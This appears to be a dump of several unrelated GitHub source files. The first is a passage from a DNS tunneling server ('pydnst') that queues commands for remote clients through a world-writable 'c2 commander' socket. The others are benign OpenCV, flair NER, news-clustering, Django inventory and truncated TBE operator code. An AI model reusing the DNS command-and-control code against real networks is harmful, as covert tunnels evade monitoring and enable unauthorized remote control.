self.pending_fragments_to_send_events[client_id].pop(command_id)\n if not self.pending_fragments_to_send_events[client_id]:\n self.pending_fragments_to_send_events.pop(client_id)\n \n def send_message(self, dns_data, rtype, addr, data_scapy=None):\n logger.info(f'Starting send_message task for transaction id {data_scapy.id} to addr {addr}')\n logger.debug(f'Reusing query qd {data_scapy.show(dump=True)}')\n message = raw(DNS(qr=1, id=data_scapy.id, aa=1, rd=0, qd=data_scapy.qd, an=DNSRR(rdata=dns_data, ttl=0,\n rrname=data_scapy.qd.qname, type=rtype)))\n logger.info(f'Sending message {message}, with data {dns_data}, and type {rtype}')\n self.transport.sendto(message, addr)\n\n def error_received(self, exc):\n logger.warning(f'error_received : {exc}')\n\n def connection_lost(self, exc):\n logger.info(f'connection_lost from : {self.peername}, {exc}')\n super().connection_lost(exc)\n\n\nclass DnstServer:\n\n def __init__(self):\n global logger\n logger = get_logger(logger_name='pydnst_server')\n\n if not os.path.exists(PATH_CONFIG):\n logger.info(f'No config file at {PATH_CONFIG}, leaving ...')\n sys.exit(1) \n with open(PATH_CONFIG,'r') as fd:\n config_toml = toml.load(fd)\n config_server = config_toml['server']\n self.LISTENING_INTERFACE = config_server['LISTENING_INTERFACE']\n self.LISTENING_PORT = config_server['LISTENING_PORT']\n self.SERVER_PRIVATE_PEM_PATH = config_server['SERVER_PRIVATE_PEM_PATH']\n self.MESSAGES_JSON = config_server['MESSAGES_JSON']\n self.UDS_PATH_COMMANDER = config_server['UDS_PATH_COMMANDER']\n\n self.DNST_SERVER_NAME = DNST_SERVER_NAME = config_toml['general']['DNST_SERVER_NAME'].encode()\n self.FILTERED_QUERY_NAMES = (DNST_SERVER_NAME, b'ns1.'+DNST_SERVER_NAME, b'ns2.'+DNST_SERVER_NAME,\n b'www.'+DNST_SERVER_NAME, b'www.ns1.'+DNST_SERVER_NAME, b'www.ns2.'+DNST_SERVER_NAME, \n b'_dmarc.'+DNST_SERVER_NAME)\n self.DEFAULT_SHARED_KEY = config_toml['general']['DEFAULT_SHARED_KEY'].encode()\n \n try:\n self.LISTENING_ADDRESS = check_output(f\"ip --brief addr show {self.LISTENING_INTERFACE} | awk -F ' ' '{{ print $3 }}' | cut -d '/' -f 1\", shell=True).strip().decode()\n except Exception:\n logger.exception('Cannot obtain eth0 ip address to listen on')\n print('Cannot obtain eth0 ip address to listen on')\n raise\n self.uds_path_commander = self.UDS_PATH_COMMANDER\n self.tunnel_messages = {}\n self.tunnel_mng_messages = {RSA_COMMAND_ID:{}, ACK_COMMAND_ID:{}}\n self.pending_fragments_to_send_events = {}\n \n try:\n with open(self.MESSAGES_JSON, 'w') as fd:\n json.dump({}, fd)\n except Exception:\n logger.exception('init')\n \n self.server_private_key = None\n self.shared_keys = {} \n if os.path.exists(self.SERVER_PRIVATE_PEM_PATH):\n logger.info('Using a server private pem') \n try:\n with open(self.SERVER_PRIVATE_PEM_PATH, 'rb') as key_file:\n self.server_private_key = crypto_serialization.load_pem_private_key(\n key_file.read(),\n password=None,\n backend=crypto_default_backend()\n )\n except Exception:\n logger.exception('server_private_key')\n\n def store_ordered_tunnel_messages(self, tunnel_messages):\n #replace command_id 0 by 'keep-alive' in json_display (stored json self.MESSAGES_JSON)\n json_display = {}\n for key,value in tunnel_messages.items():\n new_value = {}\n for key1,value1 in value.items():\n new_value[key1 if key1 != '0' else 'keep-alive'] = value1\n json_display[key] = new_value\n \n #order display by date (per client)\n res = OrderedDict({kk:json_display[kk] for kk in sorted(json_display,\n key=lambda ke: json_display[ke][list(json_display[ke].keys())[0]]['date'], reverse=True)})\n \n new_res = OrderedDict()\n for key,vdict in res.items():\n new_res[key] = OrderedDict({kk:vdict[kk] for kk in sorted(vdict, key=lambda ke: vdict[ke]['date'], reverse=True)})\n \n with open(self.MESSAGES_JSON, 'w') as fd:\n json.dump(new_res, fd, indent=4) \n\n def generate_command_id(self):\n return str(random.randint(MIN_COMMAND_ID,256))\n \n async def commander_cb(self, reader, writer):\n #header of 2 bytes telling the length to read\n try:\n logger.info('commander_cb was called')\n next_length_bytes = await reader.readexactly(MSG_2_STRUCT.size)\n next_length = MSG_2_STRUCT.unpack(next_length_bytes)[0]\n command_to_send = await asyncio.wait_for(reader.readexactly(next_length), timeout=5)\n command_json = json.loads(command_to_send.decode())\n client_id = command_json['client_id']\n command = command_json['command']\n now = datetime.fromtimestamp(time.time()).strftime(r'%Y-%m-%d--%H:%M:%S')\n command_id = self.generate_command_id()\n if client_id not in self.tunnel_messages:\n logger.warning(f'Client {client_id} not found in tunnel_messages {self.tunnel_messages}. Ignoring ...')\n return\n self.tunnel_messages[client_id][command_id] = {'command_awaiting_ka':command, 'date':now}\n self.store_ordered_tunnel_messages(self.tunnel_messages)\n writer.write(b'ok')\n try:\n await asyncio.wait_for(writer.drain(), timeout=5)\n except Exception:\n logger.exception('commander_cb writer drain')\n logger.info(f'Command {command} was successfully added to tunnel_messages for client {client_id}')\n except asyncio.CancelledError:\n raise \n except Exception:\n logger.exception('commander_cb')\n finally:\n writer.close()\n if PYTHON_GREATER_37:\n try:\n await writer.wait_closed() #python 3.7 \n except Exception as exc:\n logger.warning('commander_cb writer.wait_closed : '+str(exc)) \n \n async def run_command_listener(self):\n logger.info('Starting command listener')\n self.commander_server = await asyncio.start_unix_server(self.commander_cb, path=self.uds_path_commander)\n #for convenience we want non root to be able to use the c2 commander \n os.chmod(self.uds_path_commander, stat.S_IRWXU | stat.S_IRWXG | stat.S_IROTH | stat.S_IWOTH)\n \n def run(self):\n try:\n self.loop = asyncio.get_event_loop()\n logger.info(f'DnstServer listening on {self.LISTENING_ADDRESS}:{self.LISTENING_PORT}')\n dnst_server_task = self.loop.create_datagram_endpoint(lambda :DnstServerProtocol(\n self.tunnel_messages, self.tunnel_mng_messages,\n self.store_ordered_tunnel_messages, self.pending_fragments_to_send_events,\n self.server_private_key, self.shared_keys, self.DNST_SERVER_NAME,\n self.FILTERED_QUERY_NAMES, self.DEFAULT_SHARED_KEY),\n local_addr=(self.LISTENING_ADDRESS, self.LISTENING_PORT))\n transport, protocol = self.loop.run_until_complete(dnst_server_task)\n self.loop.run_until_complete(self.run_command_listener())\n self.loop.run_forever()\n except Exception:\n logger.exception('run') \n except:\n logger.info('DnstServer stopped') \n finally:\n try:\n shutil.copy(self.MESSAGES_JSON, self.MESSAGES_JSON+'.bk')\n os.remove(self.MESSAGES_JSON)\n transport.close()\n except Exception:\n pass\n\n \n","repo_name":"mori-b/pydnst","sub_path":"pydnst/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":27310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8218489324","text":"import cv2\nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\npre_time = 0\ncurrent_time = 0\nwhile True:\n succes, frame = cap.read()\n\n current_time = time.time()\n fps = 1/ (current_time-pre_time)\n pre_time = current_time\n\n font = cv2.FONT_HERSHEY_SCRIPT_COMPLEX\n\n # FPS Box\n start_point = (0, 0)\n end_point = (102, 32)\n color = (255, 255, 255)\n thickness = -1\n\n FPS_Box = cv2.rectangle(frame, start_point, end_point, color, thickness) \n\n cv2.putText(\n FPS_Box,\n str(int(fps)),\n (31, 26),\n font, 1,\n (255, 200, 0),\n 2\n )\n\n cv2.imshow(\"Camera\", frame)\n\n if cv2.waitKey(10) == ord('0'):\n break\n \ncap.release()\ncv2.destroyAllWindows() ","repo_name":"ArNAB-0053/Face-detection-using-openCV-and-mediapipe","sub_path":"template_for_all.py","file_name":"template_for_all.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26921357292","text":"import argparse\nimport json\nimport os\nfrom typing import List\nfrom torch.optim.adam import Adam\nfrom torch.optim.sgd import SGD\n\nfrom flair.data_fetcher import NLPTaskDataFetcher, NLPTask\nfrom flair.data import TaggedCorpus\nfrom flair.embeddings import WordEmbeddings, StackedEmbeddings, PooledFlairEmbeddings, CharacterEmbeddings, \\\n BertEmbeddings\nfrom flair.training_utils import EvaluationMetric\nfrom flair.visual.training_curves import Plotter\nfrom flair.trainers import ModelTrainer\nfrom flair.models import SequenceTagger\n\n\ndef train(params):\n # 1. get the corpus\n print(NLPTask[params[\"task\"]])\n corpus = NLPTaskDataFetcher.load_corpus(task=NLPTask[params[\"task\"]], files=params['filenames'])\n print(corpus)\n\n # 2. what tag do we want to predict?\n tag_type = 'ner'\n\n # 3. make the tag dictionary from the corpus\n tag_dictionary = corpus.make_tag_dictionary(tag_type=tag_type)\n print(tag_dictionary.idx2item)\n\n embedding_types = []\n\n if params[\"word_embeddings\"] is True:\n embedding_types.append(WordEmbeddings(params[\"embeddings_name\"]))\n\n if params[\"bert_embeddings\"] is True:\n embedding_types.append(BertEmbeddings(params[\"bert_model\"]))\n\n if params[\"char_embeddings\"] is True:\n # comment in this line to use character embeddings\n embedding_types.append(CharacterEmbeddings())\n\n if params[\"charlm_embeddings\"] is True:\n embedding_types.append(PooledFlairEmbeddings('news-forward', pooling='min'))\n embedding_types.append(PooledFlairEmbeddings('news-backward', pooling='min'))\n\n embeddings = StackedEmbeddings(embeddings=embedding_types)\n\n # initialize sequence tagger\n\n tagger = SequenceTagger(hidden_size=params[\"hidden_size\"],\n embeddings=embeddings,\n tag_dictionary=tag_dictionary,\n tag_type=tag_type,\n use_rnn=params[\"use_rnn\"],\n rnn_layers=params[\"rnn_layers\"],\n use_crf=params[\"use_crf\"]\n )\n\n base_path = os.path.join(params[\"model_dir\"], params[\"model_tag\"])\n os.makedirs(base_path, exist_ok=True)\n\n with open(os.path.join(base_path, 'config.json'), \"w\") as cfg:\n json.dump(params, cfg)\n # initialize trainer\n\n if \"optimizer\" in params:\n if params[\"optimizer\"] == \"adam\":\n optim = Adam\n elif params[\"optimizer\"] == \"sgd\":\n optim = SGD\n else:\n optim = SGD\n trainer: ModelTrainer = ModelTrainer(tagger, corpus, optimizer=optim)\n\n trainer.train(base_path, EvaluationMetric.MICRO_F1_SCORE, mini_batch_size=params[\"mini_batch_size\"],\n max_epochs=params[\"max_epochs\"], save_final_model=params[\"save_model\"],\n train_with_dev=params[\"train_with_dev\"], anneal_factor=params[\"anneal_factor\"],\n embeddings_in_memory=params[\"inmem\"], test_mode=False)\n\n plotter = Plotter()\n plotter.plot_training_curves(os.path.join(base_path, \"loss.tsv\"))\n plotter.plot_weights(os.path.join(base_path, 'weights.txt'))\n\n\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument(\"--config\", default=\"config.json\")\n\n args = arg_parser.parse_args()\n\n with open(args.config) as cfg:\n params = json.load(cfg)\n\n print(params)\n train(params)\n","repo_name":"Nelsonvon/flair","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8526246803","text":"import io\nimport os\nimport sys\nimport codecs\nimport re\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom sklearn.cluster import KMeans\n#import heapq\nimport operator\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import pairwise_distances_argmin_min\n\nfrom dataCollector.Silhouette_Coefficient import S_C\nimport dataCollector.Remove_outlier\nimport django\nimport logging\n\nlogger = logging.getLogger('dataCollector')\n\ndef f_get_sorted_index_array(terms_weight_sum_array, select_num):\n return np.argsort(terms_weight_sum_array)[::-1][:select_num]\n\ndef drop_useless_words(charact_words_dictionary):\n useless_words_list = [\"said\", \"wa\", \"ha\", \"mr\", \"fa\", \"cnn\", \"bbc\"]\n for useless_word in useless_words_list:\n if useless_word in charact_words_dictionary.keys():\n del charact_words_dictionary[useless_word]\n return charact_words_dictionary\n\n\n#******************************************************************************************\n# Function description: Main body of K-means clustering. *\n#******************************************************************************************\ndef f_k_meanCluster(data_ndarray, K):\n # find 4 clusters\n R_O = dataCollector.Remove_outlier.R_outlier()\n model = KMeans(K)\n model.fit(data_ndarray)\n clustering = model.labels_\n centroids = model.cluster_centers_\n final_centroids = R_O.Remove_cluster_one(clustering, K, centroids, data_ndarray.shape[0])\n #closest_points_index_list, value = pairwise_distances_argmin_min(centroids, data_ndarray)\n closest_points_index_list, value = pairwise_distances_argmin_min(final_centroids, data_ndarray)\n #logger.debug(str(closest_points_index_list))\n\n return clustering, centroids, closest_points_index_list\n\n\n#******************************************************************************************\n# Function description: Get top N important characteristics for each cluster. *\n# Input: K_num, news_clustering, news_centroids. *\n# Return: clusters_charact_2dlist: (list of dictionery). *\n# [{('charac_words', weight), ('charac_words', weight), ...}, *\n# {...}, ..., *\n# {('charac_words', weight), ('charac_words', weight), ...}] *\n# Dimention:(N * 20). *\n#******************************************************************************************\ndef summarize_clusters_characs_2dlist(K_num, news_terms, news_clustering, news_centroids, charac_selec_num):\n clusters_charact_2dlist = []\n for cluster_centroid in news_centroids:\n cluster_charact_index_list = list( f_get_sorted_index_array(np.array(cluster_centroid), charac_selec_num) )\n clusters_charact_temp_dic = {}\n for cluster_charact_index in cluster_charact_index_list:\n clusters_charact_temp_dic[news_terms[cluster_charact_index]] = cluster_centroid[cluster_charact_index]\n clusters_charact_temp_dic = drop_useless_words(clusters_charact_temp_dic)\n clusters_charact_2dlist.append(clusters_charact_temp_dic)\n return clusters_charact_2dlist\n\n\n#******************************************************************************************\n# Function description: Get N characteristics for overall dataset, *\n# from clusters' characteristics' matrix. *\n# Input: K_num, news_clustering, news_centroids, *\n# clusters_charact_2dlist. *\n# Return: overall_charact_words_dic: (dictionery) *\n# {('charac_words', weight), *\n# ... , *\n# ('charac_words', weight) } *\n#******************************************************************************************\n\ndef summarize_clusters_characs_clustering(K_num, news_clustering, news_centroids, clusters_charact_2dlist, charac_selec_num):\n # Method-2: Use new important dimentions according each clusters.\n overall_charact_words_dic = {}\n while (len(overall_charact_words_dic) < charac_selec_num):\n cluster_index = 0\n for cluster_centroid in news_centroids:\n cluster_centroid_charac_dic = clusters_charact_2dlist[cluster_index]\n slelct_charac_key = max(cluster_centroid_charac_dic.items(), key=operator.itemgetter(1))[0]\n if slelct_charac_key not in list(overall_charact_words_dic.keys()):\n overall_charact_words_dic[slelct_charac_key] = cluster_centroid_charac_dic[slelct_charac_key]\n del (clusters_charact_2dlist[cluster_index])[slelct_charac_key]\n cluster_index += 1\n #logger.debug(str(len(overall_charact_words_dic)))\n #logger.debug(str(overall_charact_words_dic))\n return overall_charact_words_dic # {('charac_words', weight), ()}\n\n\n# ******************************************************************************************\n# Function description: draw data in 16 dimentions with clustering. *\n# Input: news_clustering, *\n# news_centroids. *\n# overall_charact_words_dic: (dictionery) *\n# {('charac_words', weight), *\n# ... , *\n# ('charac_words', weight) } *\n# ******************************************************************************************\ndef f_cluster_plot(news_terms_ndarray, K_num, closest_points_index_list):\n pca = PCA(n_components=2).fit(news_terms_ndarray)\n pca_result2D = pca.transform(news_terms_ndarray)\n\n pca_nearest_points_array = pca_result2D[closest_points_index_list,:]\n #logger.debug((pca_nearest_points_array.shape))\n\n # After lower dimension, I used the KMeans to clustering it\n model = KMeans(K_num)\n model.fit(pca_result2D)\n\n #PCA_km.fit(TFIDF_M)\n clustering = model.labels_\n centroids = model.cluster_centers_\n\n closest_points_index_list_pca, _ = pairwise_distances_argmin_min(centroids, pca_result2D)\n pca_nearest_points_array_2d = pca_result2D[closest_points_index_list_pca, :]\n #logger.debug(str(closest_points_index_list_pca))\n\n plt.scatter(pca_result2D[:, 0], pca_result2D[:, 1], c=clustering, s=30, cmap='rainbow')\n plt.scatter(centroids[:,0], centroids[:,1], marker='x', s=50, linewidths=3, color='orange', zorder=10)\n plt.scatter(pca_nearest_points_array[:, 0], pca_nearest_points_array[:, 1], marker='x', s=40, linewidths=2, color='blue', zorder=10)\n plt.scatter(pca_nearest_points_array_2d[:, 0], pca_nearest_points_array_2d[:, 1], marker='x', s=40, linewidths=2, color='red', zorder=10)\n plt.show()\n\n return closest_points_index_list_pca\n\n#******************************************************************************************\n# Function description: Show different clusters' centroids' characteristics: *\n# Input: news_clustering, *\n# news_centroids. *\n# overall_charact_words_dic: (dictionery) *\n# {('charac_words', weight), *\n# ... , *\n# ('charac_words', weight) } *\n#******************************************************************************************\n'''\ndef show_clusters_characs(news_terms, news_clustering, news_centroids, overall_charact_words_dic):\n print(\"Now print all characteristics' weight in different centroids:\")\n cludter_index = 0\n for cluster_centroid in news_centroids:\n print(\"\\tClut_%d\\t\" % cludter_index, end='', flush=True)\n cludter_index += 1\n print(\"\\n\", end='', flush=True)\n\n for charact_words_key in overall_charact_words_dic.keys():\n print(charact_words_key + '\\t: ', end='', flush=True)\n for cluster_centroid in news_centroids:\n print('%.4f\\t' % cluster_centroid[ news_terms.index(charact_words_key)], end='', flush=True)\n print(\"\\n\", end='', flush=True)\n'''\n\n#******************************************************************************************\n# Function description: Final summarization of each cluster's top characteristics. *\n# Input: news_clustering, *\n# news_centroids. *\n# clusters_charact_2dlist: (list of dictionery). *\n# [{('charac_words', weight), ('charac_words', weight), ...}, *\n# {...}, ..., *\n# {('charac_words', weight), ('charac_words', weight), ...}] *\n# Dimention:(N * 20). *\n#******************************************************************************************\n\ndef summarize_clusters_characs(news_clustering, news_centroids, clusters_charact_2dlist, charac_final_num):\n logger.debug(\"\\n\\tFinal summarization of each cluster's characteristics:\")\n cluster_index = 0\n for cluster_centroid in news_centroids:\n cluster_charac_words_dic = clusters_charact_2dlist[cluster_index]\n logger.debug(\"\\tClut_\" + str(cluster_index) + \":\")\n # Select top N characteristics according dic's values.\n top_characs = sorted(cluster_charac_words_dic, key=cluster_charac_words_dic.__getitem__, reverse=True)[0:charac_final_num]\n logger.debug(str(top_characs))\n cluster_index += 1\n\n\n# ******************************************************************************************\n# Function description: Main body of testing controlling for K-means algorithm. *\n# ******************************************************************************************\ndef f_k_means_test(news_terms_ndarray, news_terms, K_num):\n charac_selec_num = min(100, len(news_terms)) # All items are selected\n charac_final_num = 20\n\n news_clustering, news_centroids, closest_points_index_list = f_k_meanCluster(news_terms_ndarray, K_num)\n\n # Get a 2-D data with each row is a cluster's top characs' dic.\n clusters_charact_2dlist = summarize_clusters_characs_2dlist(K_num, news_terms, news_clustering, news_centroids, charac_selec_num)\n\n # Get a dic of common top characs for all clusters.\n #overall_charact_words_dic = summarize_clusters_characs_clustering(K_num, news_clustering, news_centroids, clusters_charact_2dlist, charac_selec_num)\n # Now draw all data in common-top-characs' dimentions.\n #show_clusters_characs(news_terms, news_clustering, news_centroids, overall_charact_words_dic)\n\n #summarize_clusters_characs(news_clustering, news_centroids, clusters_charact_2dlist, charac_final_num)\n closest_points_index_list_pca = None\n #closest_points_index_list_pca = f_cluster_plot(news_terms_ndarray, K_num, closest_points_index_list)\n\n return closest_points_index_list, closest_points_index_list_pca\n\n\nclass Com_similarity:\n # Tokenizer function\n def lemma_tokenizer_v2(ori_news_list):\n # use the standard scikit-learn tokenizer first\n standard_tokenizer = CountVectorizer().build_tokenizer()\n tokens = standard_tokenizer(ori_news_list)\n # then use NLTK to perform lemmatisation on each token\n lemmatizer = nltk.stem.WordNetLemmatizer()\n lemma_tokens = []\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n lemma_token = lemmatizer.lemmatize(token)\n if len(lemma_token) > 2:\n lemma_tokens.append(lemma_token)\n return lemma_tokens\n\n # Statistic K-Means find one representative news in each cluster\n def relevent_detection(self, news_obj_list):\n try:\n news_documents = []\n\n for news_obj in news_obj_list:\n if news_obj.news_summarize is not None:\n #logger.debug(\"\\t\\t#news_sum_len: %d\" % len(news_obj.news_summarize))\n news_documents.append(news_obj.news_summarize.lower())\n #logger.debug(\"\\t# Totally %d news file.\" % len(news_documents))\n\n tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000, min_df=0.1, stop_words='english', \\\n use_idf=True, tokenizer=Com_similarity.lemma_tokenizer_v2, ngram_range=(1, 1))\n tfidf_matrix = tfidf_vectorizer.fit_transform(news_documents) # fit the vectorizer to synopses\n #logger.debug(\"\\t\\tThe matrix's shape: \" + str(tfidf_matrix.shape))\n\n news_terms = tfidf_vectorizer.get_feature_names()\n #logger.debug(\"\\t\\tVocabulary has \" + str(len(news_terms)) + \" distinct terms\")\n #logger.debug(\"\\t\\tterms:\" + str(news_terms) )\n\n '''\n # Get an flat 1-D numpy.array of different terms' weights' summarization from sparse matrix.\n terms_weight_sum_array = (tfidf_matrix.sum(axis=0).getA())[0]\n #logger.debug(str(terms_weight_sum_array))\n \n # Get terms' words according their indexes.\n target_words_num = 20\n sorted_index_array = f_get_sorted_index_array(terms_weight_sum_array, target_words_num)\n #logger.debug(str(sorted_index_array))\n \n charact_words_dictionary = {}\n logger.debug(\"\\tThe top 50 most characteristic terms are:\")\n logger.debug(\"\\tTerms\\tIndex\\tWeight\")\n for sorted_index in sorted_index_array:\n charact_words_dictionary[news_terms[sorted_index]] = sorted_index\n logger.debug(\"\\t\" + str(news_terms[sorted_index]) \\\n + \"\\t:\" + str(sorted_index) \\\n + \"\\t,%.4f\" % terms_weight_sum_array[sorted_index])\n #drop_useless_words(charact_words_dictionary)\n '''\n\n # Note: the 's' parameter controls the size of the points\n news_terms_ndarray = tfidf_matrix.toarray()\n logger.info(\"\\t\\tnews_terms_ndarray's shape is: \" + str(news_terms_ndarray.shape))\n\n # Clustering for 1 group.\n K_num = 2\n closest_points_index_list, closest_points_index_list_pca = f_k_means_test(news_terms_ndarray, news_terms, K_num)\n\n logger.debug(\"\\tclosest_points_index_list:\" + str(closest_points_index_list))\n idx = 0\n for closest_points_index in closest_points_index_list:\n idx = idx + 1\n logger.info(\"Centroid -\" + str(idx) + \"- nearest News-\" + str(news_obj_list[closest_points_index].id) + \"-: \" + str(news_obj_list[closest_points_index].news_title))\n\n '''\n logger.debug(\"\\tclosest_points_index_list_pca:\" + str(closest_points_index_list_pca))\n idx = 0\n for closest_points_index in closest_points_index_list_pca:\n idx = idx + 1\n logger.info(\"Centroid -\" + str(idx) + \"- nearest News-\" + str(news_obj_list[closest_points_index].id) + \"-: \" + str(news_obj_list[closest_points_index].news_title))\n '''\n return closest_points_index_list\n except Exception as e:\n logger.error(e)\n return None\n\n # Dynamic K-Means find one representative news in each cluster\n def dynamic_relevent_detection(self, news_obj_list):\n try:\n news_documents = []\n\n for news_obj in news_obj_list:\n if news_obj.news_summarize is not None:\n # logger.debug(\"\\t\\t#news_sum_len: %d\" % len(news_obj.news_summarize))\n news_documents.append(news_obj.news_summarize.lower())\n\n tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000, min_df=0.1, stop_words='english', \\\n use_idf=True, tokenizer=Com_similarity.lemma_tokenizer_v2,\n ngram_range=(1, 1))\n tfidf_matrix = tfidf_vectorizer.fit_transform(news_documents) # fit the vectorizer to synopses\n news_terms = tfidf_vectorizer.get_feature_names()\n\n # Note: the 's' parameter controls the size of the points\n news_terms_ndarray = tfidf_matrix.toarray()\n logger.info(\"\\t\\tnews_terms_ndarray's shape is: \" + str(news_terms_ndarray.shape))\n\n # Get suitable clusters' number.\n silh_coef_obj = S_C()\n #k_num_silh_coef_dict = silh_coef_obj.compute_K(news_terms_ndarray)\n k_num_silh_coef_dict = silh_coef_obj.compute_K_elbow(news_terms_ndarray)\n #k_num_silh_coef_dict = silh_coef_obj.elbow_mean_distortion(news_terms_ndarray)\n #K_num = silh_coef_obj.Choose_cluster_number(k_num_silh_coef_dict)\n K_num = silh_coef_obj.silh_coef_and_cluster_num_linear_regression(k_num_silh_coef_dict)\n logger.debug(\"K_num:-[\" + str(K_num) + \"]-\")\n\n # Clustering for 1 group.\n #K_num = 2\n closest_points_index_list, closest_points_index_list_pca = f_k_means_test(news_terms_ndarray,\n news_terms, K_num)\n\n logger.debug(\"\\tclosest_points_index_list:\" + str(closest_points_index_list))\n idx = 0\n for closest_points_index in closest_points_index_list:\n idx = idx + 1\n logger.info(\"Centroid -\" + str(idx) + \"- nearest News-\" + str(\n news_obj_list[closest_points_index].id) + \"-: \" + str(\n news_obj_list[closest_points_index].news_title))\n\n return closest_points_index_list\n except Exception as e:\n logger.error(e)\n return None","repo_name":"WenruiShen/GrapeNews","sub_path":"gungnir/dataCollector/Com_similarity.py","file_name":"Com_similarity.py","file_ext":"py","file_size_in_byte":18844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40344508344","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import weapon, order, weapon_order\n\n\n# Create your views here.\ndef home(request):\n all_weapons = weapon.objects.all()\n return render(request, 'Django_Review/Home.html', {'weapons': all_weapons})\n\ndef weapons_inv(request):\n weapon_types = getAllWeaponTypes()\n all_weapons = weapon.objects.all()\n return render(request, 'Django_Review/Inventory.html', {'weapons': all_weapons, 'weapon_types': weapon_types})\n\ndef getAllWeaponTypes():\n\n AMMUNITION = \"AN\"\n FINESSE = \"FE\"\n HEAVY = \"HY\"\n IMPROVISED = \"ID\"\n LIGHT = \"LT\"\n LOADING = \"LG\"\n MARTIAL = \"ML\"\n RANGED = \"RD\"\n REACH = \"RH\"\n SPECIAL = \"SL\"\n THROWN = \"TN\"\n TWOHANDED = \"TD\"\n VERSATILE = \"VE\"\n\n WEAPON_TYPES = {\n \"AN\": 'Ammo',\n \"FE\": 'Fin',\n \"HY\": 'Heavy',\n \"ID\": 'Improv',\n \"LT\": 'Light',\n \"LG\": 'Load',\n \"ML\": 'Martial',\n \"RD\": 'Range',\n \"RH\": 'Reach',\n \"SL\": 'Special',\n \"TN\": 'Thrown',\n \"TD\": 'TwoHand',\n \"VE\": 'Vers'\n }\n \n return WEAPON_TYPES\n\ndef add_weapon(request):\n if(request.method == \"POST\"):\n weap_Name = request.POST.get('weap_Name')\n weap_Price = request.POST.get('weap_Price')\n weap_Type = request.POST.get('weap_Type')\n weap_Stock = request.POST.get('weap_Stock')\n weapon.objects.create(\n weapon_Name = weap_Name,\n weapon_Price = weap_Price,\n weapon_Type = weap_Type,\n weapon_Stock = weap_Stock,\n )\n return redirect('inventory')\n\ndef delete_weapon(request, pk):\n weapon.objects.filter(pk=pk).delete()\n return redirect('inventory')\n\ndef edit_weapon(request,pk):\n \n edit = get_object_or_404(weapon, pk=pk)\n\n e_weapName = request.POST.get('e_weap_Name')\n e_weapPrice = request.POST.get('e_weap_Price')\n e_weapType = request.POST.get('e_weap_Type')\n e_weapStock = request.POST.get('e_weap_Stock')\n print(e_weapName, e_weapPrice, e_weapType, e_weapStock)\n\n edit.weapon_Name = e_weapName\n edit.weapon_Price = e_weapPrice\n edit.weapon_Type = e_weapType\n edit.weapon_Stock = e_weapStock\n edit.save()\n print(str(edit))\n \n # str_edit = str(edit)\n # edited_weapon = str_edit.split('&')\n # for i in edited_weapon:\n # raw_data = i.split(\"=\")\n # FweapName = raw_data[0]\n \n \n return redirect('inventory')\n\ndef subtract_Stock(request, pk, x):\n Main_Stock = weapon.objects.get(pk=pk)\n Subtracted = Main_Stock.weapon_Stock - int(x)\n Main_Stock.weapon_Stock = Subtracted\n Main_Stock.save()\n return Subtracted\n\ndef confirm_order(request):\n if(request.method == \"POST\"):\n ptype = request.POST.get(\"payment_method\")\n weaps = request.POST.get(\"complete_order\")\n total_amt = request.POST.get(\"total_amount\")\n weap_ord = order.objects.create(total_amount_paid=total_amt, payment_type=ptype)\n\n weap_fixed = weaps[:-1]\n stuff = weap_fixed.split(\"-\")\n for it in stuff:\n row_item = it.split(\":\")\n weap_obj = weapon.objects.get(pk=int(row_item[0]))\n subtract_Stock(request, pk=it[0],x=int(row_item[1]))\n itprice = weap_obj.getPrice()\n lt = itprice * int(row_item[1])\n weapon_order.objects.create(weapon_ID =weap_obj, order_ID=weap_ord, line_Total=lt, quantity=row_item[1])\n return redirect('home')\n","repo_name":"Reinigen/Django-Review","sub_path":"Django_Reminder/Django_Review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643920956","text":"from functools import reduce as functools_reduce\n\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom te import platform as tbe_platform\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import *\n\n# define a scalar, value = -1\nSCALAR_NEG_ONE = -1.0\n# define a scalar, value = 1\nSCALAR_ONE = 1.0\n# define taylor negative threshold , value = -1.7\nTAYLOR_NEGATIVE_THRESHOLD = -1.7\n# define taylor positive threshold , value = 0.7\nTAYLOR_POSITIVE_THRESHOLD = 0.7\n# define second order parameter , value = 1 / 2.0\nTAYLOR_SECOND_ORDER_PARAM = 1 / 2.0\n# define third order parameter , value = 1 / 6.0\nTAYLOR_THIRD_ORDER_PARAM = 1 / 6.0\n# define fourth order parameter , value = 1 / 24.0\nTAYLOR_FOURTH_ORDER_PARAM = 1 / 24.0\n# define fifth order parameter , value = 1 / 120.0\nTAYLOR_FIFTH_ORDER_PARAM = 1 / 120.0\n# define sixth order parameter , value = 1 / 720.0\nTAYLOR_SIXTH_ORDER_PARAM = 1 / 720.0\n# define seventh order parameter , value = 1 / 5040.0\nTAYLOR_SEVENTH_ORDER_PARAM = 1 / 5040.0\n\n\n# pylint: disable=locally-disabled,unused-argument,too-many-locals\n@fusion_manager.register(\"log1p\")\ndef log1p_compute(input_x, output_y, kernel_name=\"log1p\"):\n \"\"\"\n algorithm: log1p\n calculating data's log1p, y = log(x + 1)\n in cloud scene, for all inputs :\n y = log(x + 1)\n in mini scene :\n y(n+1) = y(n) - 